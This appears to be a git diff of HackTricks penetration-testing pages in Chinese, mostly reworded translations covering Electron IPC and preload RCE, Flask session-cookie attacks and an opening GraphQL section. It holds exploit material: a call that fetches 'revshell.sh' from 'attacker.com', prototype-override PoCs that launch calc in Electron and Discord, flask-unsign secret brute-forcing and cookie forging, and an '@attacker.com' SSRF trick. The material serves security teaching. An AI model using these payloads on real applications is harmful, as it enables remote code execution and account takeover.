<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或**关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

50
network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
View file

@ -1,33 +1,34 @@
# Electron contextIsolation 通过 IPC 实现 RCE
# Electron contextIsolation RCE via IPC
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
如果预加载脚本从 `main.js` 文件暴露了一个 IPC 端点,渲染器进程将能够访问它,如果存在漏洞,可能会导致 RCE。
如果 preload 脚本从 main.js 文件暴露了 IPC 端点,渲染进程将能够访问它,如果存在漏洞,可能会导致 RCE。
**这些示例大多来自** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo)。查看视频以获取更多信息。
**这些示例大多来自这里** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo)。查看视频以获取更多信息。
## 示例 0
来自 [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) 的示例(您可以在这些幻灯片中看到 MS Teams 如何从 XSS 到 RCE 的完整示例,这只是一个非常基本的示例):
来自 [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) 的示例(您可以在这些幻灯片中看到 MS Teams 如何利用 XSS 进行 RCE 的完整示例,这只是一个非常基本的示例):
<figure><img src="../../../.gitbook/assets/image (9) (1).png" alt=""><figcaption></figcaption></figure>
## 示例 1
`main.js` 如何监听 `getUpdate` 并将**下载并执行**传递的任何 URL。\
还要检查 `preload.js` 如何**暴露主要的任何 IPC** 事件。
`main.js` 如何监听 `getUpdate` 并将 **下载并执行任何传递的 URL**。\
还要检查 `preload.js` 如何 **暴露任何 IPC** 事件来自 main
```javascript
// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
@ -85,7 +86,7 @@ electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
```
## 示例 2
如果预加载脚本直接向渲染器公开了调用 `shell.openExternal` 的方法,则可能导致远程命令执行。
如果预加载脚本直接向渲染器暴露调用 `shell.openExternal` 的方法,则可能获得 RCE
```javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
@ -94,7 +95,7 @@ shell.openExternal(url);
```
## 示例 3
如果预加载脚本暴露了与主进程完全通信的方式XSS 将能够发送任何事件。这取决于主进程在 IPC 方面暴露了什么。
如果预加载脚本暴露了与主进程完全通信的方式,XSS 将能够发送任何事件。这种影响取决于主进程在 IPC 方面暴露了什么。
```javascript
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
@ -104,16 +105,17 @@ window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

64
network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
View file

@ -1,30 +1,31 @@
# Electron contextIsolation RCE via preload code
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 示例 1
来自[https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30)的示例
来自 [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30) 的示例
此代码使用默认浏览器打开http(s)链接:
此代码使用默认浏览器打开 http(s) 链接:
![](<../../../.gitbook/assets/image (768).png>)
类似 `file:///C:/Windows/systemd32/calc.exe` 的内容可用于执行计算器,`SAFE_PROTOCOLS.indexOf` 正在阻止此操作
类似 `file:///C:/Windows/systemd32/calc.exe` 的内容可以用来执行计算器,`SAFE_PROTOCOLS.indexOf` 正在防止这种情况
因此攻击者可以通过XSS或任意页面导航注入此JS代码
因此,攻击者可以通过 XSS 或任意页面导航注入此 JS 代码:
```html
<script>
Array.prototype.indexOf = function(){
@ -32,7 +33,7 @@ return 1337;
}
</script>
```
由于对`SAFE_PROTOCOLS.indexOf`的调用将始终返回1337攻击者可以绕过保护并执行calc。最终利用
由于对 `SAFE_PROTOCOLS.indexOf` 的调用将始终返回 1337攻击者可以绕过保护并执行 calc。最终利用
```html
<script>
Array.prototype.indexOf = function(){
@ -41,18 +42,18 @@ return 1337;
</script>
<a href="file:///C:/Windows/systemd32/calc.exe">CLICK</a>
```
查看原始幻灯片,了解在没有提示请求权限的情况下执行程序的其他方法。
检查原始幻灯片以获取其他无需提示权限即可执行程序的方法。
显然,另一种加载和执行代码的方法是访问类似 `file://127.0.0.1/electron/rce.jar` 的内容
显然,加载和执行代码的另一种方法是访问类似 `file://127.0.0.1/electron/rce.jar` 的内容
## 示例2Discord 应用程序远程代码执行
## 示例 2Discord 应用 RCE
示例来自 [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
来自 [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
在检查预加载脚本时,我发现 Discord 公开了一个函数,允许通过 `DiscordNative.nativeModules.requireModule('MODULE-NAME')` 在网页中调用些允许的模块。\
在这里,我无法直接使用可用于远程代码执行的模块,比如 _child\_process_ 模块,但我**找到了一段可以通过覆盖 JavaScript 内置方法实现远程代码执行的代码**,并干扰公开模块的执行
在检查预加载脚本时,我发现 Discord 暴露了一个函数,允许通过 `DiscordNative.nativeModules.requireModule('MODULE-NAME')` 在网页中调用些允许的模块。\
在这里,我无法直接使用可以用于 RCE 的模块,例如 _child\_process_ 模块,但我 **发现了一段代码,通过重写 JavaScript 内置方法** 并干扰暴露模块的执行,可以实现 RCE
以下是 PoC。我确认当我从 devTools 调用名为 "_discord\_utils_" 的模块中定义的 `getGPUDriverVersions` 函数时,**弹出了** **calc** 应用程序,同时**覆盖了 `RegExp.prototype.test``Array.prototype.join`**
以下是 PoC。我能够确认,当我 **调用在 devTools 中名为 "_discord\_utils_" 的模块中定义的 `getGPUDriverVersions` 函数** 时,**calc** 应用程序会 **弹出**,同时 **重写 `RegExp.prototype.test` 和 `Array.prototype.join`**
```javascript
RegExp.prototype.test=function(){
return false;
@ -62,7 +63,7 @@ return "calc";
}
DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();
```
`getGPUDriverVersions` 函数尝试使用 "_execa_" 库执行程序,如下所示:
`getGPUDriverVersions` 函数尝试通过使用 "_execa_" 库执行程序,如下所示:
```javascript
module.exports.getGPUDriverVersions = async () => {
if (process.platform !== 'win32') {
@ -81,24 +82,25 @@ result.nvidia = {error: e.toString()};
return result;
};
```
通常_execa_ 尝试执行 `nvidiaSmiPath` 变量中指定的 "_nvidia-smi.exe_",但是由于被覆盖`RegExp.prototype.test``Array.prototype.join`**参数在 \_execa**\_** 的内部处理中被替换为 "**_**calc**_**"**。
通常_execa_ 尝试执行 "_nvidia-smi.exe_",该路径在 `nvidiaSmiPath` 变量中指定,但由于重写`RegExp.prototype.test``Array.prototype.join`**参数在 \_execa**\_** 的内部处理过程中被替换为 "**_**calc**_**"**。
具体来说,参数被更改的两个部分如下
具体来说,参数通过更改以下两个部分被替换
[https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36](https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36)
[https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55](https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L55)
{% hint style="success" %}
学习与实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告****下载 PDF 版本的 HackTricks**,请查看 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

74
network-services-pentesting/pentesting-web/flask.md
View file

@ -1,45 +1,50 @@
# Flask
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>
使用[**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
**如果您在玩CTF游戏Flask应用程序可能与** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**相关。**
**如果你正在参加 CTFFlask 应用程序可能与** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**相关。**
## Cookies
默认cookie会话名称为**`session`**。
默认的 cookie 会话名称是 **`session`**。
### 解码器
### Decoder
在线Flask cookie解码器[https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
在线 Flask cookie 解码器:[https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
#### 手动
#### Manual
获取cookie的第一部分直到第一个点并对其进行Base64解码>
获取 cookie 的第一部分,直到第一个点,并进行 Base64 解码。
```bash
echo "ImhlbGxvIg" | base64 -d
```
cookie 也使用密码进行签名
### **Flask-Unsign**
命令行工具,通过猜测秘钥来获取、解码、暴力破解和构建 Flask 应用程序的会话 cookie。
命令行工具,通过猜测秘密密钥来获取、解码、暴力破解和制作 Flask 应用程序的会话 cookie。
{% embed url="https://pypi.org/project/flask-unsign/" %}
```bash
pip3 install flask-unsign
```
@ -55,23 +60,23 @@ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<coo
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```
#### 使用传统(旧版本进行签名
#### 使用旧版本进行签名
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
### **RIPsession**
用于使用使用flask-unsign制作的cookie对网站进行暴力破解的命令行工具
命令行工具,用于使用用flask-unsign制作的cookie对网站进行暴力破解。
{% embed url="https://github.com/Tagvi/ripsession" %}
```bash
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
```
### 在 Flask 会话 cookie 中使用 SQLi 和 SQLmap
### SQLi in Flask session cookie with SQLmap
[**这个例**](../../pentesting-web/sql-injection/sqlmap/#eval) 使用 sqlmap `eval` 选项,**自动为 Flask 签名 sqlmap 负载**,使用已知的密钥。
[**这个**](../../pentesting-web/sql-injection/sqlmap/#eval) 使用 sqlmap `eval` 选项来 **自动签名 sqlmap 负载** 以便于 flask,使用已知的密钥。
## Flask 代理到 SSRF
## Flask Proxy to SSRF
[**在这篇文章中**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) 解释了 Flask 如何允许以字符 "@" 开头的请求:
```http
@ -79,7 +84,7 @@ GET @/ HTTP/1.1
Host: target.com
Connection: close
```
在以下情况中:
在以下场景中:
```python
from flask import Flask
from requests import get
@ -94,25 +99,26 @@ return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
```
可以允许引入类似 "@attacker.com" 的内容,以引发 **SSRF**
可以允许引入类似“@attacker.com”的内容以导致**SSRF**
<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>
使用 [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) 轻松构建和 **自动化工作流**,利用全球 **最先进** 的社区工具。\
立即获取访问权限:
使用[**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask)轻松构建和**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
今天获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
{% hint style="success" %}
学习和实践AWS黑客攻击<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客攻击<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或**在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR来分享黑客技巧。
</details>
{% endhint %}

240
network-services-pentesting/pentesting-web/graphql.md
View file

@ -1,30 +1,31 @@
# GraphQL
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 介绍
GraphQL被**强调**为REST API的**高效替代方案**为从后端查询数据提供了简化的方法。与REST相比后者通常需要跨多个端点发出多个请求以收集数据GraphQL使得通过**单个请求**获取所有所需信息成为可能。这种简化显著地**有利于开发人员**,减少了数据获取过程的复杂性。
GraphQL 被**强调**为 REST API 的**高效替代方案**,提供了一种简化的方式来从后端查询数据。与 REST 相比REST 通常需要在不同的端点之间进行多次请求以收集数据,而 GraphQL 允许通过**单个请求**获取所有所需的信息。这种简化显著**有利于开发者**,减少了他们的数据获取过程的复杂性。
## GraphQL与安全
## GraphQL 和安全性
随着包括GraphQL在内的新技术的出现也出现了新的安全漏洞。需要注意的一个关键点是**GraphQL默认不包含身份验证机制**。开发人员有责任实施这些安全措施。没有适当的身份验证GraphQL端点可能会向未经身份验证的用户暴露敏感信息,构成重大安全风险。
随着新技术的出现,包括 GraphQL新的安全漏洞也随之而来。一个关键点是**GraphQL 默认不包含认证机制**。开发者有责任实施这些安全措施。没有适当的认证GraphQL 端点可能会向未认证用户暴露敏感信息,构成重大安全风险。
### 目录爆破攻击和GraphQL
### 目录暴力攻击与 GraphQL
为了识别暴露的GraphQL实例建议在目录爆破攻击中包含特定路径。这些路径包括:
为了识别暴露的 GraphQL 实例,建议在目录暴力攻击中包含特定路径。这些路径包括:
* `/graphql`
* `/graphiql`
@ -35,29 +36,29 @@ GraphQL被**强调**为REST API的**高效替代方案**,为从后端查询数
* `/graphql/api`
* `/graphql/graphql`
识别开放的GraphQL实例允许检查支持的查询。这对于了解通过端点访问的数据至关重要。GraphQL的内省系统通过详细说明模式支持的查询来实现这一点。有关更多信息请参考GraphQL关于内省的文档[**GraphQL用于API的查询语言。**](https://graphql.org/learn/introspection/)
